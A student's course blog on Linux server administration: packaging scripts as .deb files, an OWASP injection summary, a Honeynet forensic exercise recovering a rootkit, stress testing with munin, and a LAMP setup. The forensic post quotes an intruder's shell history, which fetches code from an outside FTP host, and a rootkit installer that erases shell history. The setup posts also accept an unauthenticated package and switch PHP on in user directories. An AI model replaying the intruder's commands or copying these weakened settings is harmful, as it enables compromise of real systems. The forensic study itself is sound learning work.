Building dependency tree       
Reading state information... Done
The following extra packages will be installed:
  cowsay fortune-mod fortunes-min librecode0 sl
Suggested packages:
  filters fortunes
The following NEW packages will be installed
  cowsay fortune-mod fortunes-min librecode0 sl tuukkas-funnypack
0 to upgrade, 6 to newly install, 0 to remove and 6 not to upgrade.
Need to get 877 kB of archives.
After this operation, 2,212 kB of additional disk space will be used.
Do you want to continue [Y/n]? Y
WARNING: The following packages cannot be authenticated!
  tuukkas-funnypack
Install these packages without verification [y/N]? y

I got the message above and wondered a bit about the missing authentication. The installation nevertheless succeeded, and all the programs in the package worked normally.

tuukka@tuukka-xubuntu:~/public_html$ fortune | cowsay
 ______________________________________
/ Q: How many marketing people does it 
| take to change a light bulb? A: I'll |
 have to get back to you on that.     /
 --------------------------------------
           ^__^
           (oo)_______
            (__)       )/
                ||----w |
                ||     ||
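The authentication warning earlier comes from the repository being unsigned, so apt cannot verify packages from it. A common remedy, sketched here only as an assumption since I did not do it, is to generate a GPG key and let reprepro sign the repository by adding a SignWith: line to conf/distributions (the key id below is a placeholder):

```
Codename: lucid
Components: main
Suite: lucid
Architectures: i386 amd64 source
SignWith: YOUR-KEY-ID
```

Clients that import the matching public key should then stop showing the warning.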

Packaging a bash script

I have often run into an annoying shortcoming in calendars: the week number is frequently left out. So I decided to make a script that shows a calendar with week numbers.

The ncal program was already familiar to me. I browsed the manual a bit and found the solution to my problem: the -w option adds week numbers to the calendar. I will probably remember this without a script from now on, but I decided to finish the job anyway.
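As a small aside, if only the week number is needed, date can print it directly:

```shell
# Print the current ISO-8601 week number (01..53).
date +%V
```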

Create the bash script

nano kalenteri

#!/bin/bash

ncal -w

Add execute permission and test

chmod 700 kalenteri
./kalenteri

tuukka@tuukka-xubuntu:~/public_html$ ./kalenteri
    February 2014     
Su     2  9 16 23   
Mo     3 10 17 24   
Tu     4 11 18 25   
We     5 12 19 26   
Th     6 13 20 27   
Fr     7 14 21 28   
Sa  1  8 15 22      
    4  5  6  7  8

Worked beautifully!
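The chmod 700 above grants read, write and execute to the owner only; the resulting mode string can be checked on any scratch file:

```shell
# Give a temporary file mode 700 and show its permission field;
# it should read -rwx------ (owner rwx, nothing for group/other).
f=$(mktemp)
chmod 700 "$f"
ls -l "$f" | cut -c1-10
rm -f "$f"
```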

I decided to add the script to the tuukkas-funnypack package I created earlier.

nano tuukkas-funnypack.cfg

I bumped the version number from 0.2 to 0.3 and edited the Files line as follows:

Files: kalenteri /usr/local/bin/

On that line the first part (kalenteri) names the file to include, located in the same directory as tuukkas-funnypack.cfg. The second part (/usr/local/bin/) sets where the package places the file on the system it is installed on. Note: scripts placed in that directory are normally available to all users. You can verify this by running echo $PATH, which shows the directories searched for programs.
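The search path is easiest to read one directory per line, which makes it simple to confirm that /usr/local/bin is among them:

```shell
# List each directory on the command search path on its own line.
echo "$PATH" | tr ':' '\n'
```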

I built the new version and tested it

equivs-build tuukkas-funnypack.cfg
sudo gdebi -n tuukkas-funnypack_0.3_all.deb

The installation went through without problems, and I checked that the script was installed.

tuukka@tuukka-xubuntu:~/public_html$ kalenteri
    February 2014     
Su     2  9 16 23   
Mo     3 10 17 24   
Tu     4 11 18 25   
We     5 12 19 26   
Th     6 13 20 27   
Fr     7 14 21 28   
Sa  1  8 15 22      
    4  5  6  7  8

Works for user tuukka. Create a new user mrhox and try again.

sudo adduser mrhox…
su mrhox

mrhox@tuukka-xubuntu:~$ kalenteri
    February 2014     
Su     2  9 16 23   
Mo     3 10 17 24   
Tu     4 11 18 25   
We     5 12 19 26   
Th     6 13 20 27   
Fr     7 14 21 28   
Sa  1  8 15 22      
    4  5  6  7  8

The script works!

Sources

http://terokarvinen.com/2011/create-deb-metapackage-in-5-minutes
http://terokarvinen.com/2011/update-all-your-computers-with-a-deb-repository

Karvinen, Tero: Lessons 2013-02-10, Linux as a Server course

OWASP Top 10 – Number one, Injection

February 10, 2014

The Open Web Application Security Project (OWASP) is an international non-profit community whose purpose is to share knowledge and improve software security.

Every three years the community publishes a Top 10 list of the most significant and most exploited security risks. Number one on the list published in 2013 is: Injection.

In a nutshell

A user enters data (for example an SQL statement) into a form or web page that talks to a database. If the software is written carelessly, the user's input is executed and returns sensitive data or damages or modifies the contents of the database. At worst this can lead to a takeover of the site or application.
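A minimal sketch of the mechanism, with hypothetical values and shown in shell simply because string interpolation there misbehaves the same way: input concatenated into a query string changes the statement itself.

```shell
# Attacker-controlled "name" field: the quote closes the string
# literal and appends an always-true condition to the query.
input="' OR '1'='1"
query="SELECT * FROM users WHERE name = '$input'"
echo "$query"
# -> SELECT * FROM users WHERE name = '' OR '1'='1'
```

Parameterized queries avoid this by passing the input as data instead of splicing it into the SQL text.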

How to protect yourself?

Testing alone often fails to reveal these problems. The best approach is to review the code itself and account for the risks already while programming. Unwelcome visitors commonly use bots that scan for vulnerable applications.

Why protect yourself?

For reputation and contracts alike, data being lost, altered or falling into the wrong hands can be very damaging.

Sources
https://www.owasp.org/index.php/Top_10_2013-Top_10

Linux as a Server #3 – Scan of the Month 15

February 9, 2014

“You have downloaded the / partition of a compromised 6.2 Linux box. Your mission is to recover the deleted rootkit from the / partition.” – scan of the month 15

So the task is to examine a disk image of a compromised Linux system and find the rootkit.

Working with the disk image

I downloaded the challenge into the same environment I have used in earlier exercises and extracted the archive.

cd
mkdir scan15
cd scan15
wget http://old.honeynet.org/scans/scan15/honeynet.tar.gz
tar -xf honeynet.tar.gz

The archive contained a honeynet directory with the files honeypot.hda8.dd and README. I read the README and found mostly the same information as on the Scan of the Month website. I continued with the .dd file, following Tero Karvinen's guide.

mkdir allocated deleted
tsk_recover -a honeynet.hda8.dd allocated/

At this point I got a notice that the program tsk_recover was missing. The system also hinted that tsk_recover is in the sleuthkit package, so I installed it.

sudo apt-get update
sudo apt-get install sleuthkit

After that I re-ran the failed command.

tsk_recover -a honeynet.hda8.dd allocated/
-> reported: Files Recovered: 1614
tsk_recover honeynet.hda8.dd deleted/
-> reported: Files Recovered: 37

I moved on to examine the files but noticed nothing out of the ordinary. I spent time exploring and digging around, but I could not get a grip on anything and was out of ideas. I tried searching for files modified on 14, 15 or 16 March 2001.

find /home/tuukka/scan15/honeynet/allocated/ -newermt "2001-03-14"
find /home/tuukka/scan15/honeynet/allocated/ -newermt "2001-03-15"
find /home/tuukka/scan15/honeynet/allocated/ -newermt "2001-03-16"

All three commands produced a similar-looking list, and piping each to wc -l returned 1684 every time, so each query matched the same number of files.
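That behaviour is easy to reproduce in a scratch directory: anything created today is newer than a 2001 date, so every entry matches, which is exactly why all three queries returned the same count.

```shell
# Two fresh files plus the directory itself are all newer than
# the given date, so find lists three entries.
dir=$(mktemp -d)
touch "$dir/a" "$dir/b"
find "$dir" -newermt "2001-03-16" | wc -l
rm -rf "$dir"
```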

I decided to try building a timeline of all the files.

tsk_gettimes honeypot.hda8.dd >rawtimes
mactime -b rawtimes|less

The output was a magnificent tree-like listing. It turned out that quite a lot had indeed been modified on 15 March 2001; there were a great many entries. I was at a complete dead end and could not figure out how to continue. I ended up glancing at Janne Kuusela's blog. I looked at the beginning of his solution, where he had mounted the disk image, after which something about root was mentioned. I closed the blog quickly when I realised I had not mounted the image at all.

mkdir sda1
sudo mount -o “loop,nodev,noexec,ro” honeypot.hda8.dd sda1/
cd sda1

The directory looked quite interesting, and the first thing I tried was entering the root directory.

cd root/
-> bash: cd: root/: Permission denied
sudo cd root/
-> sudo: cd: command not found

I googled the problem for a moment and was advised to run sudo su.

sudo su
cd root

I got into the directory. ls showed no contents, but ls -a revealed a set of hidden files that I started to examine. Running ls -al showed that .bash_history had last been modified on 16 March 2001. Quite suspicious.

exec tcsh
ls
mkdir /var/...
ls
cd /var/...
ftp ftp.home.ro
tar -zxvf emech-2.8.tar.gz
cd emech-2.8
./configure
y
make
make
make install
mv sample.set mech.set
pico mech.set
./mech
cd /etc
pico ftpaccess
ls
exit

The emech-2.8 source code has clearly been downloaded and the program installed. I could not deduce more than that. By this point I was completely lost, bouncing back and forth, browsing and searching through everything without coming up with anything sensible. I ended up looking up the solution in Janne Kuusela's blog.

The solution

As soon as I saw the solution I was mercilessly annoyed with myself! I had gone through the deleted files several times, but for some strange reason I had not paid attention to the most essential one, lk.tgz.

It is crystal clear that the system had a rootkit.

The first lines of the install file found inside the extracted archive:

#!/bin/sh
 clear
 unset HISTFILE
 echo    "********* Instalarea Rootkitului A Pornit La Drum *********"
 echo    "********* Mircea SUGI PULA ********************************"
 echo    "********* Multumiri La Toti Care M-Au Ajutat **************"
 echo    "********* Lemme Give You A Tip : **************************"
 echo    "********* Ignore everything, call your freedom ************"
 echo    "********* Scream & swear as much as you can ***************"
 echo    "********* Cuz anyway nobody will hear you and no one will *"
 echo    "********* Care about you **********************************"
 echo
 echo
 chown root.root *

I also examined files that Janne Kuusela had not covered in his blog. I found ssh-related files: ssh_config, sshd_config, ssh_host_key, ssh_host_key.pub, ssh_random_speed. I paid particular attention to ssh_host_key.pub, which suggests the rootkit installer replaced the ssh host key pair and afterwards had ssh access to the machine.

Sources

http://jtkuusela.wordpress.com/2013/09/18/linux-palvelimena-ict4tn003-9-ja-10-syksylla-2013-kotitehtava-h3-ratkaise-scan-of-the-month-15-kasittele-haitallisia-ohjelmia-turvallisesti/
http://terokarvinen.com/2013/forensic-file-recovery-with-linux
Karvinen, Tero: Lessons 2013-02-03, Linux as a Server course

Linux as a Server #2 – Load Testing and Analysis

January 30, 2014

Assignment:

  • Collect load statistics with munin
  • Load the machine with stress
  • Use the tools covered in class to assess the load: cpu, mem, io…
  • Finally, analyse the graphs collected by munin
  • Generate a few lines in a log of your choice and analyse 2-3 of them thoroughly

Background

I performed this load and monitoring exercise on the machine installed for the previous assignment.

Collecting load statistics and stressing the system

As the assignment instructed, I used munin. In all its simplicity, its idea is to collect data about system load and report it with graphs.

Installing munin:
sudo apt-get update
sudo apt-get install munin
Testing:
firefox /var/cache/munin/www/index.html

Based on the web page opening, munin seemed to work. At this point the load graphs looked very empty.

To stress the system I installed the stress program:
sudo apt-get install stress
I tested it by opening two terminals. In the first I started top:
top
In the second I ran a load:
stress -c 1

[Screenshot: stress_test_with_top]

Assessing the load

To monitor the system I opened four terminals. In two of them I ran top, sorted so that one listed processes by CPU usage (cpu top) and the other by memory usage (mem top). In the third I ran iotop with: sudo iotop -oa. In the fourth I watched memory and swap usage by repeatedly running: free -m. I also monitored temperatures with the psensor program.

Before starting the tests I reset the swap following an askubuntu.com guide, to make its usage easier to follow.
sudo swapoff -a
sudo swapon -a

First I loaded the machine with:
stress --cpu 8 --io 8 --vm 1 --vm-bytes 1028M

[Screenshot: stressing1]

Conclusions from the screenshot:

  • The CPU is fully used (57.6% by user, 42.4% by system)
  • Memory usage is low and swap usage almost nonexistent
  • Nothing is read from or written to the hard disk

Next I wanted some disk activity, so I added the --hdd parameter to stress.
stress --cpu 8 --io 8 --hdd 1 --vm 1 --vm-bytes 1028M

[Screenshot: stressing2]

Disk activity started immediately: in the screenshot, data is being written at 170.28M. Psensor also shows nicely how the CPU temperature drops between the stress runs.

So far the swap partition had been left in peace. I wanted to test its behaviour, so I changed stress's --vm parameter.
stress --cpu 8 --io 8 --hdd 1 --vm 10 --vm-bytes 1028M

[Screenshot: stressing3]

The free -m in the bottom left corner neatly shows how, before the test, 5119m of main memory is free, and after the test starts the number collapses to 283m. The swap partition is also taken into use immediately, and as a result disk writes grow and reads begin.

Analysing munin

I installed munin well before writing this report, aiming to accumulate a bit more graph data. My original plan was to use the system casually and otherwise let it idle. While experimenting with stress, however, I had left it running, and I noticed my mistake from the CPU usage – by week graph.

[Graph: cpu-week]

The weekly view shows data collection starting (= munin install) on 28 January 2014 around 12:00. At first the CPU is loaded at about half capacity. After that the system got to rest for about six hours, until I started a stress test and forgot to stop it.

[Graph: cpu-day]

The daily view showed the forgotten stress test even more clearly, as well as the moment I noticed it and killed the stress processes. At the end are the events generated by the tests described in this post.

[Graph: mem-day]

The Memory usage – by day graph likewise clearly shows my stress antics. It can also be deduced that the system has 8GB of main memory, which has been quite sufficient, with plenty of free space. In the top right corner there are signs of swap usage, resulting from the stress experiments.

[Graph: uptime-week]

Uptime – by week shows the system booted on 28 January 2014 around 12:00 and is still running.

Generating and analysing a log entry

I set out to generate entries in auth.log.

I followed the log with:
tail -f /var/log/auth.log
I opened a new terminal and ran:
sudo adduser lokitesti
The program asked me to set a password and basic details for the user. At the same time I watched the events in auth.log. Creating the user produced the following entries:

Jan 30 15:06:56 tuukka-xubuntu sudo:   tuukka : TTY=pts/1 ; PWD=/home/tuukka ; $
Jan 30 15:06:56 tuukka-xubuntu sudo: pam_unix(sudo:session): session opened for$
Jan 30 15:06:56 tuukka-xubuntu groupadd[1575]: group added to /etc/group: name=$
Jan 30 15:06:56 tuukka-xubuntu groupadd[1575]: group added to /etc/gshadow: nam$
Jan 30 15:06:56 tuukka-xubuntu groupadd[1575]: new group: name=lokitesti, GID=1$
Jan 30 15:06:56 tuukka-xubuntu useradd[1579]: new user: name=lokitesti, UID=100$
Jan 30 15:07:02 tuukka-xubuntu passwd[1587]: pam_unix(passwd:chauthtok): passwo$
Jan 30 15:07:02 tuukka-xubuntu passwd[1587]: gkr-pam: couldn't update the login$
$mation
Jan 30 15:07:04 tuukka-xubuntu chfn[1588]: changed user 'lokitesti' information
Jan 30 15:07:06 tuukka-xubuntu sudo: pam_unix(sudo:session): session closed for user root

Every log line begins with a timestamp telling when the entry was recorded.

The first line records a sudo command run by the user tuukka: adduser is being used with sudo to create the user lokitesti.

The second line reports a session being opened for the root user. From this we can deduce that the user tuukka entered the correct password required for the sudo command to work.

The next seven lines describe adduser's steps in creating the user and setting its details; they reveal, among other things, the user's group and the location of the home directory.

Finally, the root user's session is reported closed, from which we can conclude that adduser finished creating the user.
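Picking the account-creation events out of a longer log is a one-line grep; here run against a few sample lines modelled on the output above rather than the real auth.log:

```shell
# Keep only the useradd/groupadd entries from auth.log-style input.
printf '%s\n' \
  'Jan 30 15:06:56 host groupadd[1575]: new group: name=lokitesti' \
  'Jan 30 15:06:56 host useradd[1579]: new user: name=lokitesti' \
  'Jan 30 15:07:06 host sudo: session closed for user root' \
  | grep -E 'useradd|groupadd'
```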

Sources:

http://askubuntu.com/questions/1357/how-to-empty-swap-if-there-is-free-ram

http://terokarvinen.com/2013/aikataulu-%E2%80%93-linux-palvelimena-ict4tn003-11-ja-12-kevaalla-2014

Karvinen, Tero: Lessons 2013-01-27, Linux as a Server course

Linux as a Server #1 – Installation and Configuration

January 23, 2014

Assignment: complete and report the exam of the basic Linux course.

Installing the workstation

I decided to build the workstation on Xubuntu 12.04 Precise Pangolin. I had already burned the installation DVD and tested that it works. I installed Xubuntu on the following computer:

  • Motherboard: Asus Z87-C
  • Processor: Intel Core i5-4670K 3.40GHz
  • Memory: 8GB DDR3 1600MHz
  • Hard disk: 120GB SSD SATA 3.0
  • Graphics card: GeForce GTX 560 Ti Phantom, 2GB GDDR5 (Gainward)
  • Optical drive: Asus CD/DVD

I began by booting the computer with the installation disc in the drive. Before reaching the installer I changed the boot order in the BIOS settings.

[Photo: IMG_2025]

In the Xubuntu installer I chose a local installation (Install Xubuntu) and manual partitioning. I removed all old partitions and created a swap partition roughly the size of main memory, plus a partition for the system itself with the mount point "/" using the Ext4 file system.

[Photo: IMG_2027]

By this point about 30 minutes had passed, slowed down mostly by writing this report. Normally the steps up to the partitioning stage go quickly, in roughly five minutes.

I started the system installation at 14:30.

During the installation I set my location and chose the Finnish keyboard layout.

The Xubuntu login screen appeared at 14:38.

I found the installation process (8 minutes) quite fast. I would estimate that the hardware's CPU power and especially the SSD contributed to the result.

After logging in, the system appeared on the surface to work fine.

I opened the pre-installed Firefox browser and saw that the network connection worked. On youtube.com the browser complained about a missing Adobe Flash Player. I installed it with the browser's own installer, after which YouTube videos played, but without sound.

I looked in Xubuntu's Update Manager for a default driver for the sound chip and found the PulseAudio sound server. I installed it through Update Manager, and immediately afterwards the sound worked.

For word processing and other basic office tasks Xubuntu ships with LibreOffice preinstalled. I deemed the workstation ready at 14:50.

Configuring the server for PHP development over a remote connection, creating users, and installing the mystatus shell script

I continued on the same computer with the freshly installed Xubuntu. At this point I stopped watching the clock closely, so the following times are approximate.

I started by installing and testing an SSH connection.

sudo apt-get update
sudo apt-get install openssh-server
su - esimerkkikayttaja
whoami

For installing Apache, MySQL and PHP I decided to use the tasksel tool, which can install several packages at once (much like metapackages). I followed a guide found on ubuntu's help pages. I ran the following commands:

sudo apt-get install tasksel
sudo tasksel install lamp-server
sudo /etc/init.d/apache2 stop
sudo /etc/init.d/apache2 start

Then I found the machine's IP address with sudo ifconfig, opened the browser and entered the address ifconfig reported. The example page opened, so Apache was working.

At this point the time was 15:10.

After that I puzzled for a long time over how to enable Apache for all users. For example, I wanted user pekka's home pages to live in /home/pekka/public_html/.

I found instructions in the Virtual Host section of the ubuntu.com guide mentioned above. The guide was slightly misleading: it told me to edit /etc/apache2/sites-available/000-default.conf, which I never found. Instead I found /etc/apache2/sites-available/default and edited it according to the Virtual Host guide.

I changed DocumentRoot /var/www to -> DocumentRoot /home/user/public_html

and <Directory /var/www/> to -> <Directory /home/user/public_html>

Then I copy-pasted the following command: sudo a2dissite default && sudo a2ensite mysite

Of course nothing worked, and I spent over an hour on the problem. The guide originally asked to rename the configuration file to "mysite", which I had not done; I had left it as "default". I thought the problem would be solved by running: sudo a2dissite default && sudo a2ensite default.

The pages still did not work the way I wanted. I searched many places without result and finally turned to Janne Kuusela's blog. Janne had solved the problem by running sudo a2enmod userdir and then restarting Apache with sudo service apache2 restart. After that everything worked as intended, and user pekka's files were served at http://localhost/~pekka.

I suspect the guide on ubuntu's site was written for a different release than my Xubuntu 12.04.

I started testing PHP at 17:30. I created a test file for user pekka and browsed to http://localhost/~pekka/hello.php. The page did not open; instead the browser tried to download the php file. I searched for a solution for a long time. The ubuntu.com guide suggested checking the public_html directory permissions, clearing the browser history and double-checking the URL. All of these were fine, but hello.php still downloaded instead of opening. I finally found the answer in Janne Kuusela's blog: edit /etc/apache2/mods-enabled/php5.conf with sudo nano /etc/apache2/mods-enabled/php5.conf and comment out the following lines with a hash (#):

#    <IfModule mod_userdir.c>
#        <Directory /home/*/public_html>
#            php_admin_value engine Off
#        </Directory>
#    </IfModule>

Tämän muokkauksen jälkeen testasin uudestaan siirtyä pekan hello.php sivulle ja kaikki toimi loistavasti.

Viimeisen vaiheen eli skriptin teon ja käyttäjien luonnin aloitin klo 17.45.

I created accounts for the employees with sudo adduser einava, sudo adduser pekkawin, sudo adduser akean and sudo adduser leilala. Next I ran sudo nano mystatus.sh and added the following content:

#!/bin/bash
df -h
ip addr

Finally I copied the script into place with sudo cp mystatus.sh /usr/bin/ and added execute permission with sudo chmod +x /usr/bin/mystatus.sh.
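The account creation and script installation steps above can be collected into one sketch. Note that --gecos "" is my addition, not in the post; it skips adduser's interactive full-name prompts (a password is still asked for each user):

```shell
# Create the four employee accounts, then install the status script
# on every user's PATH with execute permission:
for u in einava pekkawin akean leilala; do
    sudo adduser --gecos "" "$u"
done
sudo cp mystatus.sh /usr/bin/
sudo chmod +x /usr/bin/mystatus.sh
```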

I tested the system by logging in over SSH with each user's credentials, creating example PHP pages for the users, and running the mystatus script in each user's home directory. I confirmed the system was working at 18:30.
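The login test could also be looped over the accounts; a sketch assuming an SSH server is running on localhost:

```shell
# Log in as each user in turn and run the installed status script:
for u in einava pekkawin akean leilala; do
    ssh "$u@localhost" mystatus.sh
done
```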

Sources:

https://help.ubuntu.com/community/ApacheMySQLPHP
Linux palvelimena ict4tn003-10, autumn 2013 – Homework h1
Karvinen, Tero: Lessons 2013-01-20, Linux palvelimena course

This document may be copied and modified under the terms of the GNU General Public License (version 2 or later). http://www.gnu.org/licenses/gpl.html
Based on Tero Karvinen 2014: Linux palvelimena course, http://terokarvinen.com

Xubuntu install: burning the live DVD

January 21, 2014

The first homework of the Linux palvelimena course was to take the basic course exam and report on it. To do the exam I needed a working Linux installation disc.

I chose Xubuntu 12.04 Precise Pangolin as my distro and downloaded it as a torrent from: http://torrent.ubuntu.com/xubuntu/releases/precise/release/desktop/xubuntu-12.04.3-desktop-i386.iso.torrent

Once the download finished, I burned xubuntu-12.04.3-desktop-i386.iso onto a Verbatim DVD+R using the following hardware:

MacBook Pro – 13-inch, Mid 2012
Processor: 2.9 GHz Intel Core i7
Memory: 8 GB 1600 MHz DDR3
Graphics: Intel HD Graphics 4000 512 MB
OS: Mac OS X Lion 10.7.5

For the burn I used OS X's own Disk Utility application.
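For reference, the same burn can be done from the OS X Terminal with hdiutil; a sketch assuming the ISO is in the current directory and a blank DVD is in the drive:

```shell
# Burn the downloaded image to the inserted blank disc:
hdiutil burn xubuntu-12.04.3-desktop-i386.iso
```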

I verified the disc by booting the Xubuntu live version from the DVD.

– Tuukka

Let there be blog!

January 20, 2014

About a year ago I decided it was now or never: time to finally study in earnest. Today is the day that decision bore fruit, as my studies in the Business Information Technology degree programme at Haaga-Helia began. The feeling could not be better. :]

Right off the bat I signed up for the optional Linux palvelimena (Linux as a server) course taught by Tero Karvinen, which a friend of mine had recommended. The choice turned out to be excellent: on the very first day of school we got down to real work, and with a topic so dear to me.

Inspired by Karvinen, I ended up starting this blog. The idea is to keep a kind of diary of my studies and publish some of the schoolwork. Later on, hobby projects may also appear here.

– Tuukka